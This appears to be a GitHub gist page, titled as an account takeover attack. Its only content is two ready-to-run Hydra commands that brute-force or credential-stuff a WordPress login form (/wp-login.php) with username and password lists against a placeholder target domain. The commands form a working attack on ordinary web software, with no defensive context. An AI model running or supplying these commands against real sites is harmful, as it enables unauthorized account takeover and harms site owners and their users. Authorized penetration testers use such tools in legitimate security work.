Skip to content

Instantly share code, notes, and snippets.

@SunnyHoi
Last active December 2, 2018 06:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save SunnyHoi/ac13641cffd3530d20ceeb6533d1284c to your computer and use it in GitHub Desktop.
Save SunnyHoi/ac13641cffd3530d20ceeb6533d1284c to your computer and use it in GitHub Desktop.
An Account Takeover Attack Using Hydra's Credential Stuffing In Kali (Terminal Command 1)
hydra -L usernames.txt -P passwords.txt thetargetdomain -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 1
OR
hydra -l admin -P passwords.txt thetargetdomain -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment